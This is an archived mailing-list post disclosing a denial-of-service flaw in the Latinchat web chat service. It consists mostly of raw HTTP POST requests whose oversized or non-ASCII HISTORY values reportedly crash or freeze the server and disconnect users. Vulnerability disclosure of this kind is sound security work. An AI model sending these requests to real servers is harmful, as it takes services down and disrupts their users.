Re: Latinchat Denial Of Service

[d4rksoft <d4rksoft () hotmail com>]

Today this vulnerability keeps on existing in latinchat but with certain
difference.Instead of request:
POST /JAVA HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp004-org.latinchat.com
Content-length: 142

UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R29_6-1&HISTORY=999999999999999999999999999999999999999999999999999999999999999999999

the user is sending other request using ASCII  characters, for example :

POST /JAVA HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp004-org.latinchat.com
Content-length: 142

UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R29_6-1&HISTORY=ر«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±

by sending this request to the server, it will crash.

Another request that freezes the server has following aspect:

POST /IN HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
Referer: http://www.disp004-org.latinchat.com
Content-length: 142

using this request  the attacker can boot  certain quantity of users at the
same time and the server remains frozen until the attacker does not stop
process of attack.And in this case it does not have a lot of importance that
we are going to put in variable of history
:HISTORY=ر«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±
or
HISTORY=999999999999999999999999999999999999999999999999999999999999999999999999999

the result will be the same

Researcher: Vitto Makarsky (d4rkv1rus)
-- 
View this message in context: http://www.nabble.com/Latinchat-Denial-Of-Service-tf2082367.html#a9890343
Sent from the Vulnerability - VulnWatch mailing list archive at Nabble.com.